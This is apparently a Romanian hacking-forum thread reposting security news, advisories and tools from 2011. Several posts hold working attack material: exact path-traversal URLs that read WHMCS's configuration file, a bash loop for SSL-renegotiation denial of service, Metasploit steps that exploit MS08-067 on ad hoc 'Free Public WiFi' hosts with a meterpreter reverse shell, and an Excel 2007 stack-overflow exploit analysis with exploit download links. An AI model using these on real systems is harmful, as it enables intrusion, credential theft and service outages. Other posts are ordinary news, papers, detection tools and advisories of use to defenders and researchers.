Nytro

Hack in Paris 2011 videos - Cyberwar-4G aka The Coming Smart Phone Wars - Locking the Throne Room - ECMA Script 5, a frozen DOM and the eradication of XSS - Be a smart CISO: learn about people - "Project Quebec" and win32 exploit development with pvefindaddr - Offensive XSLT - Agnitio: the security code review Swiss army knife - Pentesting iPhone & iPad Applications - Skirack: ROP for masses - The forbidden image - Security impact of SVG on the WWW - A close look at rogue antivirus programs - Proactive Network Security through Vulnerability Management - Escaping Windows Sandboxes Videos: http://www.hackinparis.com/archive-2011 Majoritatea titlurilor suna foarte bine, sper ca va sunt utile.

Un scurt anunt de ordin administrativ, avem doi noi moderatori: Felicitari: - wildchild - Zatarra PS: Mai avem niste idei, ramane de vazut ce schimbari vor mai interveni.

Aplicam metoda de la Defcamp: http://i40.tinypic.com/2464aco.png

Patetici.

Network Security Tools For more than a decade, the Nmap Project has been cataloguing the network security community's favorite tools. In 2011 this site became much more dynamic, offering ratings, reviews, searching, sorting, and a new tool suggestion form. This site allows open source and commercial tools on any platform, except those tools that we maintain (such as the Nmap Security Scanner, Ncat network connector, and Nping packet manipulator). We're very impressed by the collective smarts of the security community and we highly recommend reading the whole list and investigating any tools you are unfamiliar with. Click any tool name for more details on that particular application, including the chance to read (and write) reviews. Many site elements are explained by tool tips if you hover your mouse over them. Enjoy! http://sectools.org/

A se privi acest post ca "asa nu se face". In atentia celor care au o astfel de mentalitate si astfel de dorinte, in caz ca nu aveti cont, evitati sa creati unul iar daca aveti deja unul, incercati sa pastrati "linistea".

WHMCS (clientarea.php) Local File Disclosure # Title : WHMCS (clientarea.php) Local File Disclosure # Author : Red Virus >>>c3o@w.cn # Product : WHMCS ( WHMCompleteSolution ) # Vendor : http://whmcs.com/ # Date : 11/04/2011 # Version : 3.X.x # Tested on : linux+apache # Homepage : www.alm3refh.com ================================================================ http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00 http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00 show the page source to see Disclosure file ================================================================ Greetz To . >>> alm3refh.com - tryag.cc - joood T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 infofst & virus hima & Karar aLShaMi & all alm3refh group ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA Sursa: WHMCS 3.x Local File Disclosure ? Packet Storm

Security bug in is_a function in PHP 5.3.7 / 5.3.8 Sep 23 2011 A few weeks ago we migrated a part of our hosting environment from PHP 5.3.6 to PHP 5.3.8. Normally an upgrade like this doesn’t cause any problems, since the PHP minor releases only contain bug- and security fixes. This time however, something big did change. The behaviour of the is_a function was radically altered, causing quite a few errors for clients using certain PHP/PEAR Frameworks.. We quickly reverted it, investigated the issue and discovered both the source, and alarmingly, it turned out that a big security hole was introduced. What was fixed? PHP 5.3.7 included a fix for PHP bug #53727. This fix however changed the behavior of the is_a() function, a function normally used to check if a certain variable is a child of a specific Class. The original behavior accepted all sorts of inputs as its primary argument, including strings. The old behavior was to see if this “string” was an instance of a specific Class, which it obviously wasn’t, and return false. The new behavior however, attempts to be “helpful”, and passes its first argument to the __autoload() function. And it is this exact change that caused such unexpected behavior for our customers. The problem our customers were having is that they had some (custom) code that implemented a very basic autoloader, in an attempt to reduce memory footprints by automatically loading class definitions when they were needed using the __autoload() function. Their code however never expected to be given anything other than a class name, but now all of a sudden they were receiving all sorts of objects. Take for example the following code snippet using a standard pear File library: //autoload function from http://www.php.net/manual/en/language.oop5.autoload.php function __autoload($class_name) { include $class_name . '.php'; } $uploaded_file = File::readAll($uploaded_filename); if (PEAR::isError($uploaded_file)){ print_error($uploaded_file); }else{ process_upload($uploaded_file); } Normally one wouldn’t expect the __autoload() function to be called at all here, but the PEAR::File library uses the PEAR standards and uses the PEAR::isError() call internally to check if the file was read correctly or if an error was returned. This function ends up calling the is_a function, and this ends up calling the autoloader function, which is obviously poorly equipped to handle anything but explicit classnames. As a result, even this standard piece of PHP code, using standard libraries and code snippets from the php.net site itself suddenly has its behavior changed. Instead of simply sending the uploaded file to the process_upload() function, the __autoload() function now tries to include a file that doesn’t exist and throws a giant error to the client. The problem with the new behavior Normally a BC breaking bug isn’t a huge deal. Sure, some people have some unexpected behavior, which is why the developers try and avoid breaking BC in a minor update. If any does happen people file a bug and the behavior is fixed in the next update. The same happened to this bug: PHP bug #55475 was filed and a discussion was started about whether this bug should be fixed or if the change was intended behavior. The biggest problem with this new behavior however, is not just the fact that errors are suddenly displayed. Of course this was a problem for the webmasters hosting at our servers, but the real problem lies even deeper than that… A lot of __autoload() implementations we found on our systems use the standard example from the php.net to include their classes, which doesn’t contain any sort of checks before trying to include a file. While one could argue that it’s never a good idea to simply copy example code into a live environment, this does happen more often than not, according to our scans. And it is exactly in this standard behavior that the problem lies. If we look again at the example above, it’s easy to see what happens. A file, say a JPG file, is uploaded by the user and read from the disk. The script checks to see if it read the file correctly and in doing so passes the contents of the uploaded file to the __autoload() function, that tries to load the class. Now normally the server would print an error stating “Error: “include(/var/www/domain.com/upload/.php) [function.include]: failed to open stream: No such file or directory” (error #2).”, and present this to the user. Now what if the user doesn’t upload an image file, but a carefully crafted text file with a JPEG extension. Imagine for example the following contents in the file: http://www.cracker.com/hack-me-include Now we take that file and upload it to the website. The file is read by File::readAll(), its contents returned in the $uploaded_file. We pass this variable to the PEAR::isError() function, it passes it to the __autoload() function, which blindly prepares the string to include: "http://www.cracker.com/hack-me-include" . ".php" => "http://www.cracker.com/hack-me-include.php A nice and complete URL. It feeds this to the include() function which downloads the file with code from the remote website and, eventually, executes it. At this point, you can consider your website lost, as the hacker can execute whatever code it wants on your website. He has full access to your database configuration file, your settings, your database with customer information, and everything else. The only recourse you have at this point is to restore your entire website from a known and trusted backup, change all your passwords (Both for your hosting environment, your website, and for all your customers who’s information has been exposed to the hackers. The fix Luckily there’s quite a few ways to fix it. Disable the setting allow_url_include in your PHP.ini to prevent remote file inclusion Patch your __autoload() to only include from a local dir; 1 include("./includes/" . $class_name . ".php"); Install Suhosin to protect yourself from remote file inclusion, and more. Of course, the best fix for this is to not install PHP 5.3.7 or PHP 5.3.8 untill the PHP Project has fixed this bug and reverted to the old behavior The impact The impact of this bug is relatively small. It takes quite some specific code to get your input passed all the way to the is_a/autoloader, but as the example showed it’s possible to do. I personally don’t expect to see any exploits abusing this bug, but when it comes to the security of your website, better safe than sorry. Also, for customers hosted at Byte, good news. Of course we have the allow_url_include setting turned off by default. Sursa: http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/

Microsoft Excel Use after free/Memory corruption ####################################################################### Luigi Auriemma Application: Microsoft Excel http://office.microsoft.com/en-us/excel/ http://office.microsoft.com/en-us/downloads/CD001022531.aspx Versions: tested Office 2003 11.8335.8333 SP3 Platforms: Windows Bug: use after free Exploitation: file Date: 03 Nov 2011 (found 24 Aug 2011) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Excel 2003 is a spreadsheet program, part of the Office 2003 suite still supported by Microsoft. ####################################################################### ====== 2) Bug ====== Use-after-free probably located in the code that handles the vbscript macros: eax=00492d78 ebx=00000000 ecx=feeefeee edx=00185ff8 esi=004c72b8 edi=00492478 eip=65058591 esp=00185fd0 ebp=0018601c iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 VBE6!DllVbeInit+0x40f6f: 65058591 ff11 call dword ptr [ecx] ds:002b:feeefeee=???????? 0:000:x86> k ChildEBP RetAddr 0018601c 6501c0dd VBE6!DllVbeInit+0x40f6f 00186074 6505dee2 VBE6!DllVbeInit+0x4abb 001860a8 6505e21c VBE6!DllVbeInit+0x468c0 00186220 767cbc9c VBE6!DllVbeInit+0x46bfa 00000000 00000000 ole32!StgIsStorageFile+0x764 How to replicate: - open the proof-of-concept via web or manually - "An error occurred while loading 'Module1'. Do you want to continue loading the project?" select No, if you select Yes then the bug doesn't seem to be replicable - "Unexpected error (32790)" select OK - "Excel found unreadable content in ..." Yes or No is the same - now reopen the proof-of-concept and the bug will happen immediately The reopening of the same file seems necessary probably because the Office suite uses only one instance of its programs and performs a particular reallocation of the resources when a file gets reopened. Note that I have tested only the latest version of Office 2003 on Windows 7. The proof-of-concept is NOT optimized. Modified bytes: excel_1a.xls: 0006FCA4 AA 01 excel_1b.xls: 0006FCB0 AD 40 ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/excel_1.zip ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### ####################################################################### Luigi Auriemma Application: Microsoft Excel http://office.microsoft.com/en-us/excel/ http://office.microsoft.com/en-us/downloads/CD001022531.aspx Versions: tested Office 2003 11.8335.8333 SP3 Platforms: Windows Bug: memory corruption Exploitation: file Date: 03 Nov 2011 (found 24 Aug 2011) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Excel 2003 is a spreadsheet program, part of the Office 2003 suite still supported by Microsoft. ####################################################################### ====== 2) Bug ====== Memory corruption: eax=00000000 ebx=00690066 ecx=00000de9 edx=00000de8 esi=000202ad edi=00630020 eip=30039ea2 esp=001896a8 ebp=02000814 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 Excel!Ordinal41+0x39ea2: 30039ea2 c7450800010000 mov dword ptr [ebp+8],100h ss:002b:0200081c=00690066 0:000:x86> k ChildEBP RetAddr 001896b0 30278c45 Excel!Ordinal41+0x39ea2 001896c8 30278c45 Excel!Ordinal41+0x278c45 001896e0 3070c95a Excel!Ordinal41+0x278c45 00189708 301fd1cb Excel!MdCallBack+0x27fe3e 001899f8 010300dd Excel!Ordinal41+0x1fd1cb 001899fc 00000000 0x10300dd Note that the exception can change and NO additional research has been performed. How to replicate: - open the proof-of-concept via web or manually - excel_2b.xls requires the clicking of "Open" when requested - now reopen the proof-of-concept and the bug will happen immediately The reopening of the same file seems necessary probably because the Office suite uses only one instance of its programs and performs a particular reallocation of the resources when a file gets reopened. Note that I have tested only the latest version of Office 2003 on Windows 7. The proof-of-concept is NOT optimized. Modified bytes: excel_2a.xls: 00067B5F 06 00 excel_2b.xls: 00067B63 00 7F excel_2c.xls: 00000D70 00 04 ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/excel_2.zip ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### Surse: - http://aluigi.altervista.org/adv/excel_1-adv.txt - http://aluigi.altervista.org/adv/excel_2-adv.txt

Text-based CAPTCHA Strengths and Weaknesses Elie Bursztein, Stanford University elie at cs.stanford.edu Matthieu Martin, Stanford University mamartin at stanford.edu John C. Mitchell jcm at cs.stanford.edu The slides and paper are available from free from Text-based CAPTCHA Strengths and Weaknesses - Elie Bursztein Follow Elie onTwitter : https://twitter.com/elie and Google+: http://ly.tl/g ABSTRACT We carry out a systematic study of existing visual CAPTCHAs based on distorted characters that are augmented with anti-segmentation techniques. Applying a systematic evaluation methodology to 15 current CAPTCHA schemes from popular web sites , we find that 13 are vulnerable to automated attacks. Based on this evaluation, we identify a series of recommendations for CAPTCHA designers and attackers, and possible future directions for producing more reliable human/computer distinguishers. Download: http://cdn.ly.tl/publications/text-based-captcha-strengths-and-weaknesses.pdf

Duqu Analysis & Detection Tool Released NSS engineers have developed a scanning tool that can be used to detect all DuQu drivers installed on a system. This tool was developed in the hopes that additional drivers can be discovered to allow us to learn more about the functionality, capabilities and ultimate purpose of DuQu. Based on layout of the drivers discovered so far, the NSS tool is capable of detecting 100% of drivers with zero false positives. Because it is using advanced pattern recognition techniques, it is also capable of detecting new drivers as they are discovered. Two new drivers were discovered after the tool was completed, and both were detected by the NSS tool with no updates required. Download: https://github.com/halsten/Duqu-detectors Via: Duqu Analysis & Detection Tool Sursa: Security-Shell: Duqu Analysis & Detection Tool Released Sursa:

Paul4Games poate sa vina doar daca ia niste shaorma dinaia de la el. :->

Pe mine cine ma sponsorizeaza cu niste bautura?

THC-SSL-DOS It's not as elegant as the private thc-ssl-dos but works quite well indeed. 2 simple commands in bash: -----BASH SCRIPT BEGIN----- thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 127.0.0.1:443 2>/dev/null; done } for x in `seq 1 100`; do thc-ssl-dosit & done -----BASH SCRIPT END------- ______________ ___ _________ \__ ___/ | \ \_ ___ \ | | / ~ \/ \ \/ | | \ Y /\ \____ |____| \___|_ / \______ / \/ \/ http://www.thc.org THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors are aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection. Download: Windows binary: thc-ssl-dos-1.4-win-bin.zip Unix Source : thc-ssl-dos-1.4.tar.gz Use "./configure; make all install" to build. Usage: ./thc-ssl-dos 127.3.133.7 443 Handshakes 0 [0.00 h/s], 0 Conn, 0 Err Secure Renegotiation support: yes Handshakes 0 [0.00 h/s], 97 Conn, 0 Err Handshakes 68 [67.39 h/s], 97 Conn, 0 Err Handshakes 148 [79.91 h/s], 97 Conn, 0 Err Handshakes 228 [80.32 h/s], 100 Conn, 0 Err Handshakes 308 [80.62 h/s], 100 Conn, 0 Err Handshakes 390 [81.10 h/s], 100 Conn, 0 Err Handshakes 470 [80.24 h/s], 100 Conn, 0 Err Comparing flood DDoS vs. SSL-Exhaustion attack: A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server. This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are sub optimal: Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack. The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amount of SSL Handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS). Tips & Tricks for whitehats 1. The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU. 2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used. 3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, ... or the secure database port). Counter measurements: No real solutions exists. The following steps can mitigate (but not solve) the problem: 1. Disable SSL-Renegotiation 2. Invest into SSL Accelerator Either of these countermeasures can be circumventing by modifying THC-SSL-DOS. A better solution is desireable. Somebody should fix this. Yours sincerely, The Hackers Choioce #!/bin/the hacker's choice - THC Sursa: http://www.thc.org/thc-ssl-dos/

'Poison Ivy' Kit Enables Easy Malware Customization for Attackers By Brian Prince on November 03, 2011 It is no secret malware kits have been the source of many of the infections plaguing users in recent years. This trend is epitomized by Poison Ivy, a remote administration tool (RAT) at the heart of the Nitro attacks targeting the chemical and defense industries. In a new research paper, Microsoft chronicled how Poison Ivy works and why it continues to be utilized by attackers. For one thing, the tool is available for free. “Poison Ivy has an official website from which the kit is distributed. It is also available on a variety of underground websites and forums,” according to the Microsoft report. “This free and open distribution is growing increasingly uncommon as the malware authors of today tend to operate exclusively within their trusted circles and sell their creations to the highest bidders.” According to Microsoft, Poison Ivy uses a client/server architecture to essentially turn victim machines into “servers” that operators can then connect to and remotely control. “The malware is considered a kit because operators can configure the server application to their liking before generating a server assembly that is then distributed and covertly installed on victim systems,” the Microsoft researchers wrote in the paper. “These server assemblies are very small (generally between 7 KB and 10 KB). The kit also contains a “client” component that a controller can use to remotely access and control compromised systems.” Once on an infected system, the malware enables an attacker to download and upload files remotely, log keystrokes, inject malicious code and perform other malicious activities. The malware is distributed in a variety of ways, from software vulnerabilities to phishing e-mails, with the latter being how Poison Ivy infiltrated RSA earlier this year. Poison Ivy was also linked to the GhostNet spy operation uncovered in 2009, as well as the Nitro attacks recently publicized by Symantec. “With Poison Ivy there's the option to pay the author for customized versions,” Roel Schouwenberg, senior researcher at Kaspersky Lab, told SecurityWeek. “However, we believe that in these APT-style attacks the attackers customize Poison Ivy themselves.” Officials at Microsoft said the company has removed Poison Ivy from some 16,000 infected machines as of last month. In the report, researchers note the United States has been the hardest hit in 2011, accounting for 12 percent of infections. Second and third on the list are Korea and Spain, which registered nine and seven percent, respectively. The Microsoft paper can be downloaded here: http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=27871 Sursa: https://www.securityweek.com/poison-ivy-kit-enables-easy-malware-customization-attackers Problema e urmatoarea: astia s-au trezit dupa 3 ani ca exista astfel de "kit"-uri?

REC - Reverse Engineering Compiler Features As mentioned, Rec Studio 4 is still under development. Most target independent features have been completed, such as: Multihost: Rec Studio runs on Windows XP/Vista/7, Ubuntu Linux, Mac OS X. Symbolic information support using Dwarf 2 and partial recognition of Microsoft's PDB format. C++ is partially recognized: mangled names generated by gcc are demangled, as well as inheritance described in dwarf2 is honored. However, C++ is a very broad and difficult language, so some features like templates won't likely be ever supported. Types and function prototype definitions can be specified in text files. Some standard Posix and Windows APIs are already provided in the Rec Studio package. Interactivity is supported, limited to definition of sections, labels and function entry points. Will need to improve it to support in-program definition of types and function parameters. Although REC can read Win32 executable (aka PE) files produced by Visual C++ or Visual Basic 5, there are limitations on the output produced. REC will try to use whatever information is present in the .EXE symbol table. If the .EXE file was compiled without debugging information, if a program data base file (.PDB) or Codeview (C7) format was used, or if the optimization option of the compiler was enabled, the output produced will not be very good. Moreover, Visual Basic 5 executable files are a mix of Subroutine code and Form data. It is almost impossible for REC to determine which is which. The only option is to use a .cmd file and manually specify which area is code and which area is data. In practice, only C executable files produce meaningful decompiled output. Download: http://www.backerstreet.com/rec/recdload.htm

Exploiting “Free Public WiFi” Posted by Skyler on November 2, 2011 – 12:05 pm A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test. My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited ( MS 08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine: Connect to the adhoc network # iwconfig wlan1 essid "Free Public WiFi" mode adhoc Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients. # tcpdump -ni wlan1 -s0 -nt IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138) Configure your IP (for the reverse shell to shovel back to) # ifconfig wlan1 196.254.1.1 netmask 255.255.0.0 Own It # msconsole # use exploit/windows/smb/ms08_067_netapi # set PAYLOAD windows/meterpreter/reverse_tcp # set LPORT 9999 # set RHOST 169.254.131.118 # set LHOST 169.254.1.1 # exploit Pretty straight forward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! its fantastic! Sursa: http://securityreliks.securegossip.com/2011/11/exploiting-free-public-wifi/

As Hacking Increases, Being Anonymous Getting Harder Anonymous isn’t so anonymous anymore. Companies like Sony will continue to witness more breaches of their virtual networks until top level executives start taking hackers, and the cyber gangs that run many of them, as seriously as they take their client base. Not only do Sony PlayStation gamers want their IDs and internet protocol addresses kept secret, companies like Sony want their computer systems, housing thousands of sacred corporate data, protected just the same. In the tug of war between software security and cyber criminals, the red ribbon on the rope is still squarely in the middle, which means this is one battle the security guys have not fully won. In fact, it is doubtful that they ever will. For every malware companies like Kaspersky Lab have destroyed, two more have popped up in its place. Tim Armstrong, a virus researcher at the Massachusetts based headquarters of Russian IT security firm Kaspersky Lab said on the company’s website Wednesday that corporations were not doing enough to protect their data, and the personal information of their clients. “Companies have a lack of high level education that these threats are important to deal with,” he said. “Until they do, more security breaches will happen.” Sony has become the poster child of bad corporate IT. The company’s online gaming division was hacked again last month. Hacking has become somewhat glamorous. But hackers operate in different worlds. There’s thee advanced persistent threat, or APT, which is usually the mastermind of governments. There’s various cyber criminals and gangs from China to Russia who are after bank accounts and harvesting personal identities. Then there’s the new hacktivism group, like Anonymous, and even LulzSec who once said that hackers should target Sony’s PlayStation site in order to get Americans off the couch. Many companies might not understand internet security, but the backside of a security breach is often more costly than it is to set up a security wall around a product, or network; a network that a growing number of corporate customers are linked into through QR codes and, of course, the now famous “cloud” of virtual networks that are making personal hard drives obsolete. On Oct. 21, I spoke with Kaspersky Lab analyst Sergey Golovanov about the latest security threats from the APTs to botnets, and whether or not the top three software security firms had it under control. Rapoza: Your CEO Eugene Kaspersky says computer networks are increasingly under attack. Is it getting worse? Golovanov: I think we all have the malicious security issues under control at present. But if individuals and companies do not see just how big of a problem these code writers are becoming, and if they let their guard down, then the malware writers will definitely win. All the world is connected by computers. Your electric power is run by computer networks. Stuxnet, a worm IT security analysts found last year, shut down all of Iran’s electricity. If we are talking about a common user, whether a company or a personal computer or smart phone, malware writers can do anything they want with the data they mine from a network. They will still your data. They will steal your money. They will steal your identity. It is becoming a bigger problem. Experts at Kaspersky Lab are continuing an ongoing investigation into what has become the biggest malware program to date, known as Duqu. Golovanov said last month that Duqu shares some characteristics with the infamous Stuxnet worm that targeted industrial installations in Iran. Though the ultimate objective of the creators of this new cyber threat is still unknown nearly two months later, what is clear is that Duqu is being used for carrying out targeted attacks on a limited number of objects, included those in Iran. Commenting on the new findings, Alexander Gostev, Chief Security Expert at Kaspersky Lab, was quoted saying on the company’s website: “Despite the fact that the location of the systems attacked by Duqu are located in Iran, to date there is no evidence of their being industrial or nuclear program-related systems (like Stuxnet). As such, it is impossible to confirm that the target of the new malicious program is the same as that of Stuxnet. Nevertheless, it is clear that every infection by Duqu is unique. This information allows one to say with certainty that Duqu is being used for targeted attacks on pre-determined objects.” Duqu is most likely an APT. That type of program isn’t going to hack into a person’s X Box Live account, or their Android. In fact, the malware gunning for Microsoft and Google networks are numerous and potentially just as damaging. Not only does a company, like Sony, start to lose credibility in its fight against cybercrime, but smartphones running Android are more susceptible to attacks than iPhones. Bad for Google. Great for Apple. All told, on computer devices running Kaspersky Lab security software alone, 213,602,142 network attacks were blocked. Over 263 million malware programs were detected and neutralized. By comparison, in August 193.9 million network attacks were blocked and 258 million malware programs were detected and eliminated. That’s just on machine’s running Kaspersky Lab IT software, so the number is actually much bigger when considering devices using Symantec’s Norton brand security products and McAfee. KR: What’s making Android more attractive to hackers than iPhone? SG: We haven’t found any iPhone malware yet. Everyone is looking for the Android users and that’s probably because the iPhone is a closed operating system and the Android is an open operating system so it is easier to create malicious software for them. KR: The new quick response (QR) codes, those crazy scanable boxes you see with scrambled crossword puzzle-like squares inside on everything from the local newspaper to a box of cereal now; they seem to be the new favorite of hackers. How do they work and how do you stop them? SG: You can use security software applications to stop them, for the most part. The first known instance of QR code malware we found in Russia in September. Russians thought they were downloading a new Android app called Jimm, but instead when they swiped their phone over that bar code it ended up sending numerous text messages to a long distance number that they had to pay for. We’ve found a few of them in Russia and know who is spreading them and who is making them. KR: Who is it? SG: It’s a hacker network in Russia. Mostly Russian. The Russians are like the project managers of the group and the QR codes are just spread out through malware writers within that network through blogs or on news websites that were hacked. The code brings users to a fake application. It’s all about exploiting people, and once you’re infected, the hackers have your phone number and can access info on your smartphone. KR: What’s a recent malware program you guys helped neutralize? SG: The Hlux botnet. We did that with Microsoft mostly. We were tracking it since early in the year. It was mostly steeling personal data, phising, spamming and sending out denial of service attacks on computers. We have full control over it now and are working with U.S. law enforcement on the case. The roots of the operation is in the U.S., but we are pretty sure their base of operations is in Russia. KR: How do you stay on top of hacker groups? SG: We infiltrate their online chat forums, especially through the invisible web or by using Tor, an anonymous network where hackers like LulzSec and Anonymous often hang out. KR: A black market internet. Deep cover cyberspace. That’s as anonymous as you get, I guess. SG: Yes. We’re in there. We have to weed through a lot of nonsense, but you can get a sense of what those groups are doing in that hidden internet. They’re usually up to no good. Sursa: http://www.forbes.com/sites/kenrapoza/2011/11/03/as-hacking-increases-being-anonymous-getting-harder/

Microsoft Excel 2007 SP2 Buffer Overwrite Exploit Abysssec Research 1) Advisory information Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability Analysis : Abysssec.com Vendor : Microsoft Corporation: Software, Smartphones, Online, Games, Cloud Computing, IT Business Technology, Downloads Impact : Critical Contact : info [at] abysssec.com Twitter : @abysssec Microsoft : A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. each excel file can contain multiple BOF (2057) records . This record specifies the first substream associated with workbook. One of the fields in these records, specify substream recordd to come with. This field can be extracted from sub_3018F0C2 function. .text:301A0C87 push [ebp+arg_2C] .text:301A0C8A mov ecx, [ebp+var_14] .text:301A0C8D push 1 .text:301A0C8F call sub_3018F0C2 .text:301A0C94 mov ecx, eax .text:301A0C96 mov eax, [ebp+arg_24] .text:301A0C99 cmp eax, ebx .text:301A0C9B mov [ebp+var_10], ecx .text:301A0C9E jz short loc_301A0CA2 .text:301A0CA0 mov [eax], ecx If the field value is equal with 400, sub_3019DFBA function is called to check file type. if file type is xls EXCEL.exe will display a message If approved it will continue to run the code.if you change file extension to xlb there will be any message. After this step sub_3053F626 function will be executed. This function will parse the next BOF records. .text:304D4E9D cmp [ebp+arg_20], ebx .text:304D4EA0 jnz short loc_304D4EC6 .text:304D4EA2 test dword ptr word_30EDCF9C, 2000000h .text:304D4EAC jnz short loc_304D4EC6 .text:304D4EAE mov edx, [ebp+arg_C] .text:304D4EB1 mov ecx, [ebp+arg_8] .text:304D4EB4 push 3Fh .text:304D4EB6 call sub_3019DFBA .text:304D4EBB cmp eax, ebx .text:304D4EBD mov [ebp+var_8], eax .text:304D4EC0 jz loc_304D4FD3 .text:304D4EC6 .text:304D4EC6 loc_304D4EC6: ; CODE XREF: sub_301A0BC7+3342D9j .text:304D4EC6 ; sub_301A0BC7+3342E5j .text:304D4EC6 push ebx .text:304D4EC7 push dword_30EB89A4 .text:304D4ECD push [ebp+var_C] .text:304D4ED0 call sub_3053F626 .text:304D4ED5 cmp dword_30F5E64C, ebx .text:304D4EDB mov [ebp+var_8], eax .text:304D4EDE jz short loc_304D4EE7 .text:304D4EE0 cmp eax, ebx .text:304D4EE2 jz short loc_304D4EE7 one of records may come after BOF,is undocumented record which have record type equal to 0xA7 (167). for truly parsing this record should come with another record with 0x3C (60) record type. if it meet this requirement the length of records will be read and copied to the stack. the function which operation of copying data records in the stack is sub_30199E55. This function takes three arguments. The first argument specifies the number of bytes to copy, which will read from file. The second argument specifies the destination of the copy and the third argument specifies the maximum amount of data can be copied. values of the second and third arguments based on the amount of computing reading from file and into this cumpoting,computational error which may occur here ... .text:3053F830 call sub_301A0A01 .text:3053F835 cmp eax, 3Ch .text:3053F838 mov [ebp+var_ED4], eax .text:3053F83E jnz loc_30540488 .text:3053F844 call sub_301A0A01 .text:3053F849 mov ecx, [ebp+var_EDC] .text:3053F84F imul ecx, [ebp+var_F00] .text:3053F856 mov edi, eax .text:3053F858 mov eax, [ebp+var_EE0] .text:3053F85E lea ebx, [ecx+eax+3] .text:3053F862 call sub_301A0ABE .text:3053F867 push 0FFFFFFFDh .text:3053F869 pop edx .text:3053F86A sub edx, ecx .text:3053F86C add eax, edx .text:3053F86E push eax ; Dst .text:3053F86F push ebx ; int .text:3053F870 mov eax, edi .text:3053F872 call sub_30199E55 the vulnerability that exists here is that we can change the value of parameter 3 whith our own values. program will not correcly controll third argument of sub_30199E55 this and can result in the desired amount and location of desired data can overwrite in the stack. .text:30199E60 cmp edi, [esp+4+Dst] .text:30199E64 ja loc_303EE1B7 .text:30199E6A mov ecx, [esp+4+arg_0] .text:30199E6E push ebx .text:30199E6F mov ebx, dword_30F726C0 .text:30199E75 push ebp .text:30199E76 mov ebp, nNumberOfBytesToRead .text:30199E7C push esi .text:30199E7D mov [esp+10h+Dst], ecx .... .text:30199E93 mov eax, [esp+10h+Dst] .text:30199E97 push esi ; Size .text:30199E98 lea edx, dword_30F6E6B8[ebx] .text:30199E9E push edx ; Src .text:30199E9F push eax ; Dst .text:30199EA0 sub edi, esi .text:30199EA2 call memcpy .text:30199EA7 add [esp+1Ch+Dst], esi .text:30199EAB add ebx, esi .text:30199EAD add esp, 0Ch .text:30199EB0 test edi, edi .text:30199EB2 mov dword_30F726C0, ebx .text:30199EB8 jnz loc_301E0DB3 Exploiting : Stack overflows are not hard to exploit at all ! but as we have both /GS , SAFESEH here. because given that we are destined to memcpy we can change it so that it begins to overwrite the stack after GS. and from there when the return comes , our values contained in the ESP and we can call it with simple call esp and game is over !!! Exploit can be download from here : http://www.abysssec.com/blog/wp-content/uploads/2011/11/MS11-021.zip EDB mirror : http://www.exploit-db.com/sploits/18067.zip Sursa: Microsoft Excel 2007 SP2 Buffer Overwrite Exploit

